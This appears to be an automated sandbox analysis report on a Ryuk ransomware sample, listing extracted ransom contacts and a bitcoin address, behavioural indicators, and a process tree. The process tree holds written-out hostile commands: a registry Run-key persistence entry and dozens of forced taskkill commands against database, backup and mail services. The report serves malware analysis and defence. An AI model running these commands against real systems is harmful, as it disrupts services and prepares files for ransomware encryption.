Analysis
-
max time kernel
148s -
max time network
154s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
17-04-2021 13:15
Static task
static1
Behavioral task
behavioral1
Sample
dll64.dll
Resource
win7v20210408
Behavioral task
behavioral2
Sample
dll64.dll
Resource
win10v20210410
Behavioral task
behavioral3
Sample
svchost.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
svchost.exe
Resource
win10v20210410
General
-
Target
svchost.exe
Malware Config
Extracted
C:\RyukReadMe.txt
ryuk
eliasmarco@tutanota.com
CamdenScott@protonmail.com
15RLWdVnY5n1n7mTvU1zjg67wt86dhYqNj
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Executes dropped EXE 1 IoCs
Processes:
ZqqUZ.exepid process 2588 ZqqUZ.exe -
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
svchost.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\ResolveHide.tiff svchost.exe -
Deletes itself 1 IoCs
Processes:
ZqqUZ.exepid process 2588 ZqqUZ.exe -
Drops startup file 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\RyukReadMe.txt svchost.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos = "C:\\users\\Public\\ZqqUZ.exe" reg.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
svchost.exedescription pid process target process PID 3976 set thread context of 1804 3976 svchost.exe svchost.exe -
Drops file in Program Files directory 64 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_18.svg svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\core_icons.png svchost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\LICENSE svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp6-ppd.xrm-ms svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_backarrow_default.svg svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Microsoft.VCLibs.x86.14.00.appx svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-ma\ui-strings.js svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\ClientLangPack2019_eula.txt svchost.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\RyukReadMe.txt svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CPDF_RHP.aapp svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fi-fi\ui-strings.js svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf svchost.exe File opened for modification C:\Program Files\Common Files\System\ado\msadomd28.tlb svchost.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kn\RyukReadMe.txt svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\RyukReadMe.txt svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_KMS_Client-ul.xrm-ms svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\over-arrow-navigation.svg svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\RyukReadMe.txt svchost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\RyukReadMe.txt svchost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css svchost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7TSFrame.png svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Send2Fluent.White.png svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\RyukReadMe.txt svchost.exe File opened for modification C:\Program Files\Microsoft Office\Updates\Download\PackageFiles\319A820A-549C-425F-BFCE-042E33B791C5\RyukReadMe.txt svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-il\ui-strings.js svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\example_icons.png svchost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.security_8.1.14.v20131031.jar svchost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_ja.jar svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdXC2RVL_MAKC2R-ul-oob.xrm-ms svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\de-de\RyukReadMe.txt svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\he-il\RyukReadMe.txt svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_Trial-ppd.xrm-ms svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProMSDNR_Retail-pl.xrm-ms svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdXC2RVL_KMS_ClientC2R-ul.xrm-ms svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\System\VEN2232.OLB svchost.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\faf_icons.png svchost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\RyukReadMe.txt svchost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_zh_4.4.0.v20140623020002.jar svchost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-heapwalker.jar svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\RyukReadMe.txt svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\css\main-selector.css svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\RyukReadMe.txt svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ca-es\ui-strings.js svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sk-sk\RyukReadMe.txt svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\inline-error-1x.png svchost.exe File opened for modification C:\Program Files\7-Zip\Lang\va.txt svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-80.png svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\he-il\RyukReadMe.txt svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_MAK_AE-ppd.xrm-ms svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\AccessRuntime_eula.txt svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ko-kr\RyukReadMe.txt svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\Flash.mpp svchost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif svchost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_F_COL.HXK svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\core_icons_retina.png svchost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt_0.12.100.v20140530-1436.jar svchost.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\management-agent.jar svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\css\main-selector.css svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nl-nl\RyukReadMe.txt svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\RyukReadMe.txt svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\cross.png svchost.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\bg-BG\RyukReadMe.txt svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 7884 3836 WerFault.exe DllHost.exe -
Kills process with taskkill 44 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5012 taskkill.exe 5660 taskkill.exe 1016 taskkill.exe 3096 taskkill.exe 2688 taskkill.exe 4724 taskkill.exe 4528 taskkill.exe 4124 taskkill.exe 4172 taskkill.exe 4656 taskkill.exe 5152 taskkill.exe 5720 taskkill.exe 5784 taskkill.exe 4944 taskkill.exe 5068 taskkill.exe 5276 taskkill.exe 5848 taskkill.exe 1312 taskkill.exe 2108 taskkill.exe 4164 taskkill.exe 4460 taskkill.exe 4404 taskkill.exe 4952 taskkill.exe 900 taskkill.exe 4004 taskkill.exe 4216 taskkill.exe 4328 taskkill.exe 2760 taskkill.exe 5332 taskkill.exe 5512 taskkill.exe 748 taskkill.exe 652 taskkill.exe 428 taskkill.exe 3984 taskkill.exe 5444 taskkill.exe 4276 taskkill.exe 4588 taskkill.exe 4792 taskkill.exe 5216 taskkill.exe 5588 taskkill.exe 3856 taskkill.exe 4868 taskkill.exe 4512 taskkill.exe 5396 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 30 IoCs
Processes:
ZqqUZ.exeWerFault.exepid process 2588 ZqqUZ.exe 2588 ZqqUZ.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe 7884 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
ZqqUZ.exepid process 2588 ZqqUZ.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeZqqUZ.exeWerFault.exedescription pid process Token: SeDebugPrivilege 748 taskkill.exe Token: SeDebugPrivilege 652 taskkill.exe Token: SeDebugPrivilege 3856 taskkill.exe Token: SeDebugPrivilege 1016 taskkill.exe Token: SeDebugPrivilege 1312 taskkill.exe Token: SeDebugPrivilege 2108 taskkill.exe Token: SeDebugPrivilege 3096 taskkill.exe Token: SeDebugPrivilege 900 taskkill.exe Token: SeDebugPrivilege 2688 taskkill.exe Token: SeDebugPrivilege 4004 taskkill.exe Token: SeDebugPrivilege 428 taskkill.exe Token: SeDebugPrivilege 3984 taskkill.exe Token: SeDebugPrivilege 4164 taskkill.exe Token: SeDebugPrivilege 4216 taskkill.exe Token: SeDebugPrivilege 4328 taskkill.exe Token: SeDebugPrivilege 4276 taskkill.exe Token: SeDebugPrivilege 4460 taskkill.exe Token: SeDebugPrivilege 4404 taskkill.exe Token: SeDebugPrivilege 4528 taskkill.exe Token: SeDebugPrivilege 4588 taskkill.exe Token: SeDebugPrivilege 4656 taskkill.exe Token: SeDebugPrivilege 4724 taskkill.exe Token: SeDebugPrivilege 4792 taskkill.exe Token: SeDebugPrivilege 4868 taskkill.exe Token: SeDebugPrivilege 4944 taskkill.exe Token: SeDebugPrivilege 5068 taskkill.exe Token: SeDebugPrivilege 5012 taskkill.exe Token: SeDebugPrivilege 4124 taskkill.exe Token: SeDebugPrivilege 4512 taskkill.exe Token: SeDebugPrivilege 2760 taskkill.exe Token: SeDebugPrivilege 4172 taskkill.exe Token: SeDebugPrivilege 4952 taskkill.exe Token: SeDebugPrivilege 5152 taskkill.exe Token: SeDebugPrivilege 5216 taskkill.exe Token: SeDebugPrivilege 5276 taskkill.exe Token: SeDebugPrivilege 5396 taskkill.exe Token: SeDebugPrivilege 5332 taskkill.exe Token: SeDebugPrivilege 5444 taskkill.exe Token: SeDebugPrivilege 5512 taskkill.exe Token: SeDebugPrivilege 5588 taskkill.exe Token: SeDebugPrivilege 5660 taskkill.exe Token: SeDebugPrivilege 5784 taskkill.exe Token: SeDebugPrivilege 5720 taskkill.exe Token: SeDebugPrivilege 5848 taskkill.exe Token: SeDebugPrivilege 2588 ZqqUZ.exe Token: SeDebugPrivilege 7884 WerFault.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
svchost.exesvchost.exeZqqUZ.exedescription pid process target process PID 3976 wrote to memory of 1804 3976 svchost.exe svchost.exe PID 3976 wrote to memory of 1804 3976 svchost.exe svchost.exe PID 3976 wrote to memory of 1804 3976 svchost.exe svchost.exe PID 3976 wrote to memory of 1804 3976 svchost.exe svchost.exe PID 3976 wrote to memory of 1804 3976 svchost.exe svchost.exe PID 3976 wrote to memory of 1804 3976 svchost.exe svchost.exe PID 3976 wrote to memory of 1804 3976 svchost.exe svchost.exe PID 3976 wrote to memory of 1804 3976 svchost.exe svchost.exe PID 3976 wrote to memory of 1804 3976 svchost.exe svchost.exe PID 3976 wrote to memory of 1804 3976 svchost.exe svchost.exe PID 3976 wrote to memory of 1804 3976 svchost.exe svchost.exe PID 1804 wrote to memory of 2588 1804 svchost.exe ZqqUZ.exe PID 1804 wrote to memory of 2588 1804 svchost.exe ZqqUZ.exe PID 2588 wrote to memory of 748 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 748 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 652 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 652 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 3856 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 3856 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 1016 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 1016 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 1312 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 1312 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 3096 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 3096 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 2108 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 2108 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 900 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 900 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 2688 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 2688 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4004 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4004 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 428 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 428 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 3984 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 3984 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4164 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4164 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4216 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4216 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4276 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4276 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4328 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4328 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4404 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4404 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4460 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4460 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4528 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4528 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4588 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4588 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4656 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4656 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4724 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4724 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4792 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4792 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4868 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4868 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4944 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 4944 2588 ZqqUZ.exe taskkill.exe PID 2588 wrote to memory of 5012 2588 ZqqUZ.exe taskkill.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
- Modifies extensions of user files
- Drops startup file
- Drops file in Program Files directory
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3836 -s 8482⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
-
c:\windows\system32\sihost.exesihost.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\users\Public\ZqqUZ.exe"C:\users\Public\ZqqUZ.exe" C:\Users\Admin\AppData\Local\Temp\svchost.exe3⤵
- Executes dropped EXE
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM zoolz.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM agntsvc.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM dbeng50.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM dbsnmp.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM encsvc.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM excel.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM firefoxconfig.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM infopath.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM isqlplussvc.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM msaccess.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM msftesql.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mspub.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mydesktopqos.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mydesktopservice.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mysqld.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mysqld-nt.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mysqld-opt.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM ocautoupds.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM ocomm.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM ocssd.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM onenote.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM oracle.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM outlook.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM powerpnt.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqbcoreservice.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqlagent.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqlbrowser.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqlservr.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqlwriter.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM steam.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM synctime.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM tbirdconfig.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM thebat.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM thebat64.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM thunderbird.exe /F4⤵
